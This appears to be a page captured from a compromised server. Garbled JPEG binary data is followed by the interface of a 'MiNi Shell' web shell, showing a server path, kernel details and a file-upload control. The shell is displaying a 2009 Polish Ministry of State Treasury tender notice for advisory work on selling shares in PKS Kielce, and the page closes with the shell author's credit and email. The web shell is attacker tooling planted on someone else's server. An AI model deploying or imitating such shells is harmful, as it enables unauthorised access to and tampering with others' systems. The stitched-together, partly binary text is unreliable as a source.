JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090403/91538-N-2009.html

<p class="kh_header"><b>Warszawa: Świadczenie usług dla Ministra Skarbu Państwa w procesie zbycia akcji Spółki Przedsiębiorstwo Komunikacji Samochodowej w Kielcach S.A. z siedzibą w Kielcach</b><br>
<b>Numer ogłoszenia: 91538 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Skarbu Państwa , ul. Krucza 36/Wspólna 6, 00-522 Warszawa, woj. mazowieckie, tel. 022 6958719, faks 022 6958935.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msp.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług dla Ministra Skarbu Państwa w procesie zbycia akcji Spółki Przedsiębiorstwo Komunikacji Samochodowej w Kielcach S.A. z siedzibą w Kielcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług dla Ministra Skarbu Państwa w procesie zbycia akcji Spółki Przedsiębiorstwo Komunikacji Samochodowej w Kielcach S.A. z siedzibą w Kielcach (zwanej dalej Spółką), tj. przygotowanie niezbędnych analiz Spółki,  sporządzenie memorandum informacyjnego Spółki (na pisemne żądanie ZAMAWIAJĄCEGO), zwanych dalej Zamówionymi Dziełami (FAZA I) oraz, jeżeli ZAMAWIAJĄCY uzna to za potrzebne doradztwo w procesie zbywania akcji Spółki przez Skarb Państwa, zwanych dalej Zleconymi Pracami (FAZA II). 

2.    Szczegółowy opis przedmiotu zamówienia:
 
2.1. Faza I - wykonanie Zamówionych Dzieł, na które składają się:

2.1.1.	ustalenie sytuacji prawnej majątku Spółki (zwane dalej analizą sytuacji prawnej majątku Spółki);
2.1.2.  ustalenie stanu i perspektyw rozwoju przedsiębiorstwa Spółki (zwane dalej analizą stanu i perspektyw rozwoju przedsiębiorstwa Spółki);
2.1.3. ocenę realizacji obowiązków Spółki wynikających z tytułu wymagań ochrony środowiska i ochrony zabytków wchodzących w skład majątku Spółki (zwaną dalej analizą realizacji obowiązków wynikających z tytułu wymagań ochrony środowiska i ochrony zabytków);
2.1.4. 	oszacowanie wartości Spółki, przy użyciu co najmniej dwóch różnych metod wyceny;
2.1.5.	sporządzenie memorandum informacyjnego Spółki, zgodnie z wymogami obowiązującego prawa (na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez Zamawiającego);

- jednokrotną bezpłatną aktualizację Zamówionych Dzieł na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez ZAMAWIAJĄCEGO nie przekraczającym terminu obowiązywania umowy.
2.2. Faza II - opcjonalnie - na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez Zamawiającego wykonanie wszystkich lub niektórych spośród wymienionych poniżej Zleconych Prac: 
2.2.1. 	przygotowanie i obsługa procesu sprzedaży osobom trzecim akcji Spółki w trybie negocjacji podjętych na podstawie publicznego zaproszenia, a w szczególności identyfikację i selekcję potencjalnych Nabywców, badanie ich wiarygodności finansowej, a także doradztwo w negocjacjach dotyczących sprzedaży akcji, przygotowanie projektu umowy sprzedaży akcji, z uwzględnieniem wskazówek Zamawiającego i doprowadzenie do jej zawarcia oraz wejścia w życie;
2.2.2. 	doradztwo na rzecz ZAMAWIAJĄCEGO - w okresie nie krótszym niż do wykonania wszystkich zobowiązań Nabywcy zawartych w umowie sprzedaży akcji Spółki - przy wprowadzaniu ewentualnych zmian w umowie sprzedaży akcji Spółki oraz przy dokonywaniu interpretacji postanowień tej umowy, a także przy prowadzeniu negocjacji w celu polubownego rozstrzygnięcia sporów wynikłych w związku z wykonywaniem umów sprzedaży akcji Spółki przed skierowaniem sprawy na drogę sądową;
2.2.3. 	doradztwo przy sprzedaży kolejnych pakietów akcji Spółki zgodnie z Ustawą o komercjalizacji i prywatyzacji i obowiązującymi przepisami prawa w celu zbycia do 85% akcji Spółki w trybie negocjacji podjętych na podstawie publicznego zaproszenia w trybie art. 33 ust. 1 pkt. 3 ustawy z dnia 30 sierpnia 1996 roku o komercjalizacji i prywatyzacji(Dz. U. z 2002 r., Nr 171, poz. 1397 ze zm.).

ZAMAWIAJĄCY ustalił, że użyte powyżej określenie na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez ZAMAWIAJĄCEGO należy rozumieć w ten sposób, że ZAMAWIAJĄCY w formie pisemnej wyznaczy dzień rozpoczęcia wykonania Zamówionego Dzieła, określonego w pkt 2.1. ppkt 2.1.5. lub Zleconych Prac co będzie równoznaczne ze złożeniem oświadczenia o skorzystaniu z opcji w zakresie określonym w piśmie.

ZAMAWIAJĄCY zastrzega sobie prawo do swobodnego wyboru zakresu Zamówionych Dzieł lub Zleconych Prac, które powierzy WYKONAWCY do realizacji oraz do nie wykorzystania wszystkich opcji lub uprawnień wskazanych w przedmiocie zamówienia.

Szczegółowy zakres, harmonogram oraz warunki jakim powinien odpowiadać przedmiot zamówienia i jego wykonanie określone są w projekcie umowy (projekt Umowy, której zawarcia oczekuje ZAMAWIAJĄCY od WYKONAWCY stanowi ZAŁĄCZNIK NR 5 do SIWZ), zwanej dalej Umową. 

Dokonanie jednokrotnej bezpłatnej aktualizacji Zamówionych Dzieł, o których mowa w pkt 2.1. ppkt 2.1.1. - 2.1.5. Specyfikacji w ramach wynagrodzenia za Zamówione Dzieła, określonego w Umowie, na pisemne żądanie ZAMAWIAJĄCEGO i w terminie wyznaczonym przez ZAMAWIAJĄCEGO nie przekraczającym terminu obowiązywania umowy, o którym mowa w § 19 umowy, przy czym aktualizacja winna dotyczyć stanu faktycznego i prawnego na dzień jej sporządzenia lub inny dzień w przypadkach uzasadnionych i za pisemną zgodą Zamawiającego, z zachowaniem warunków sporządzania Zamówionych Dzieł, o których mowa w załączniku Nr 2 do Umowy. 

Za kolejne aktualizacje poszczególnych Zamówionych Dzieł WYKONAWCY będzie przysługiwało 10 % wynagrodzenia za poszczególne Zamówione Dzieła, o którym mowa w § 3 Umowy. Przy wykonaniu, odbiorze oraz wypłacie wynagrodzenia za kolejne aktualizacje Zamówionych Dzieł zastosowanie będą mieć odpowiednie postanowienia Umowy. Ponadto wykonane Zamówione Dzieła powinny być przekazane ZAMAWIAJĄCEMU na nośnikach elektronicznych umożliwiających ich wykorzystanie przez ZAMAWIAJĄCEGO w formie innej niż zapis na papierze.

Zamówione Dzieła, o których mowa w pkt 2.1. Specyfikacji powinny być opracowane w formie pisemnej i powinny uwzględniać stan faktyczny i prawny na dzień ich sporządzenia lub inny dzień w przypadkach uzasadnionych i za pisemną zgodą ZAMAWIAJĄCEGO lub na jego żądanie oraz zawierać wynikające z nich wnioski. Do Zamówionych Dzieł należy dołączyć w formie ponumerowanych załączników oryginały, odpisy lub kserokopie dokumentów stanowiących podstawę ich wykonania potwierdzone za zgodność z oryginałem przez osobę uprawnioną (osoby uprawnione) do reprezentacji  WYKONAWCY. 

Do sporządzonych  Zamówionych Dzieł, określonych w pkt 2.1 ppkt 2.1.1 - 2.1.3 i ppkt  2.1.5 oraz do sporządzonej aktualizacji Zamówionych Dzieł, WYKONAWCA powinien dołączyć pisemne oświadczenie Zarządu Spółki o zgodności informacji w nich zawartych ze stanem faktycznym lub wyjaśnić przyczynę braku takiego oświadczenia.

WYKONAWCA jest ponadto zobowiązany do informowania ZAMAWIAJĄCEGO o zmianach prawa lub wystąpieniu innych istotnych zdarzeń mających wpływ na sytuację Spółki.

Wszystkie przekazywane ZAMAWIAJĄCEMU przez WYKONAWCĘ w ramach wykonania Umowy Zamówione Dzieła mają być podpisane i opieczętowane na każdej stronie pieczęcią WYKONAWCY i parafami osób reprezentujących WYKONAWCĘ wraz z zaznaczeniem wersja z dnia ..... 
3. ZAMAWIAJĄCY zastrzega, zgodnie z art. 36 ust. 5 ustawy, że Zamówione Dzieło, o którym mowa w Rozdziale 3 pkt 2.1. ppkt 2.1.4., tj. oszacowanie wartości Spółki przy użyciu, co najmniej dwóch różnych metod wyceny  oraz Zlecone Prace, o których mowa w Rozdziale 3 pkt 2.2. nie mogą być powierzone Podwykonawcom.
W przypadku pozostałych części zamówienia ZAMAWIAJĄCY żąda wskazania w ofercie tych części zamówienia, których wykonanie WYKONAWCA powierzy Podwykonawcom..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każda składana oferta musi być zabezpieczona przez cały okres związania ofertą wadium w wysokości: 5 000,00 zł (słownie: pięć tysięcy złotych).
2. Wadium może być wnoszone w następujących formach:
1)   pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)   gwarancjach bankowych,
4)   gwarancjach ubezpieczeniowych,
5)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z  dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2007 r Nr 42 poz. 275)
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy o numerze:
Ministerstwo Skarbu Państwa
Bank Gospodarstwa Krajowego
I Oddział Warszawa
13 1130 1017 0019 9426 2520 0007

z dopiskiem wadium w postępowaniu o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na doradztwo w procesie zbycia akcji PKS w Kielcach S.A.

a w przypadku pozostałych ww. form wniesienia wadium należy złożyć je w siedzibie ZAMAWIAJĄCEGO, pokój nr 223 - Sekretariat  Biura Dyrektora Generalnego w godz. 8.15-16.15 w dni robocze.
Oznacza to, że nie później niż przed terminem składania ofert, w posiadaniu ZAMAWIAJĄCEGO muszą znaleźć się ww. formy wadium.
4. Do oferty należy dołączyć kopię dowodu wpłaty lub innej formy wadium.
5.  Wadium wniesione w pieniądzu ZAMAWIAJĄCY przechowuje na rachunku bankowym.
6. Zwrot wadium nastąpi niezwłocznie, jeżeli zaistnieje jedna z poniższych okoliczności:
1) upłynął termin związania ofertą;
2) zawarto umowę i wniesiono zabezpieczenie należytego wykonania umowy;
3) ZAMAWIAJĄCY unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
7. Z zastrzeżeniem art. 46 ust. 4a ustawy prawo zamówień publicznych ZAMAWIAJĄCY zobowiązany jest zwrócić wadium niezwłocznie na wniosek WYKONAWCY:
1) który wycofał ofertę przed upływem terminu składania ofert;
2) który został wykluczony z postępowania;
3) którego oferta została odrzucona.
8. ZAMAWIAJĄCY żąda ponownego wniesienia wadium przez WYKONAWCÓW, którym zwrócono wadium, na podstawie pkt 7 ppkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. WYKONAWCY wnoszą wadium w terminie określonym przez ZAMAWIAJĄCEGO.
9.  Wadium wniesione w pieniądzu, ZAMAWIAJĄCY zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez WYKONAWCĘ.
10. ZAMAWIAJĄCY zatrzymuje wadium wraz z odsetkami, jeżeli WYKONAWCA w odpowiedzi na wezwanie, o którym w art. 26 ust. 3 ustawy prawo zamówień publicznych, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11. ZAMAWIAJĄCY zatrzymuje wadium wraz odsetkami, jeżeli WYKONAWCA, którego oferta została wybrana:
1)	odmówi podpisania umowy na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie Umowy stało się niemożliwe z przyczyn leżących po stronie WYKONAWCY.
12. WYKONAWCA, którego oferta nie będzie zabezpieczona wadium w całym okresie związania ofertą zostanie wykluczony z postępowania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą się ubiegać WYKONAWCY, którzy:
1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
co oznacza, że WYKONAWCA musi spełnić następujące warunki: 
a) jest uprawniony do występowania w obrocie prawnym, zgodnie z wymaganiami ustawowymi;
b) 	spełnia warunki określone w art. 22 ust. 1 ustawy prawo zamówień publicznych i nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy;
c) 	WYKONAWCA wykonał należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia - a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - co najmniej dwa zamówienia związane z wykonaniem usług odpowiadających przedmiotowi zamówienia tj. wykonał co najmniej analizy spółki obejmujące: ustalenie sytuacji prawnej majątku spółki, ustalenie stanu i perspektyw rozwoju, oszacowanie wartości spółki przy użyciu co najmniej dwóch metod wyceny, memorandum informacyjne oraz przygotował, przeprowadził i rozliczył co najmniej jedną transakcję zbycia akcji podmiotu w ofercie publicznej lub akcji/udziałów w trybie rokowań;
d)	posiada środki finansowe na rachunku lub zdolność kredytową w wysokości nie  mniejszej niż niż 150 000,00 złotych (słownie: sto pięćdziesiąt tysięcy złotych).
e) 	jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 200 000,00 złotych (słownie: dwieście tysięcy złotych).
f) 	WYKONAWCA dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia przy czym: 1) co najmniej jedna osoba będzie posiadała wykształcenie prawnicze oraz doświadczenie w zakresie wykonania analizy sytuacji prawnej majątku, 2) co najmniej jedna osoba będzie posiadała doświadczenie w zakresie wykonania oszacowania przedsiębiorstwa spółki, 3) co najmniej jedna osoba będzie posiadała uprawnienia do sporządzania operatów szacunkowych, 4) co najmniej jedna osoba będzie posiadała doświadczenie w zakresie sporządzenia analiz realizacji obowiązków wynikających z tytułu wymagań ochrony środowiska i zabytków, 5) co najmniej jedna osoba będzie posiadała doświadczenie w zakresie przygotowania i obsługi procesu sprzedaży osobom trzecim akcji Spółki.
g) 	WYKONAWCA realizujący prace związane z dostępem do informacji niejawnych musi posiadać pełnomocnika do spraw ochrony informacji niejawnych spełniającego wymagania określone w przepisach Ustawy z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych (tekst jedn.: Dz. U. z 2005 r. Nr 196, poz. 1631 ze zm.).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy prawo zamówień publicznych - według wzoru ZAŁĄCZNIK NR 1 do SIWZ. 
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 odpowiednio pkt 4 - 8 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że WYKONAWCA nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
6. Wykaz wykonanych usług, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie - według wzoru stanowiącego ZAŁĄCZNIK NR 2 do SIWZ.
7. Wykaz osób i podmiotów, którymi dysponuje lub będzie dysponować WYKONAWCA i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, według wzoru stanowiącego ZAŁĄCZNIK NR 3 do SIWZ. (zgodnie z Rozdziałem 8 pkt 1.4 ppkt f) SIWZ).
8. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 7 WYKONAWCA wskazał osoby którymi będzie dysponował.
9. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym WYKONAWCA posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową WYKONAWCY, wystawionej nie wcześniej niż  trzy miesiące przed upływem terminu składania ofert. Z informacji musi wynikać konkretna kwota w PLN posiadanych środków finansowych lub wysokość zdolności kredytowej w PLN.
10. Dokumenty stwierdzające, posiadanie pełnomocnika do spraw ochrony informacji niejawnych spełniającego wymagania ustawy z dnia 22 stycznia 1999 r. o ochronie informacji niejawnych tj. kserokopie poświadczenia bezpieczeństwa i zaświadczenia o odbyciu przeszkolenia przez służbę ochrony państwa, kserokopię dokumentu potwierdzającego powierzenie tej osobie pełnienia takiej funkcji.
11. Polisa, a w przypadku jej braku inny dokument potwierdzający, że WYKONAWCA jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
12. Wykonawcy wspólnie ubiegający się o zamówienie publiczne w celu spełnienia warunków udziału w postępowaniu składają:
a) każdy z Wykonawców - dokument wymieniony w pkt. 1-5;
b) dokumenty potwierdzające spełnienie warunków w pkt. 6-11 - wspólnie;
c) pełnomocnictwo wskazujące zakres czynności, do których umocowany jest peł nomocnik..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.msp.gov.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MINISTERSTWO SKARBU PAŃSTWA ul. Krucza 36/Wspólna 6 00-522 Warszawa pok. 223..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 10:00, miejsce: MINISTERSTWO SKARBU PAŃSTWA ul. Krucza 36/Wspólna 6 00-522 Warszawa pok. 223..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com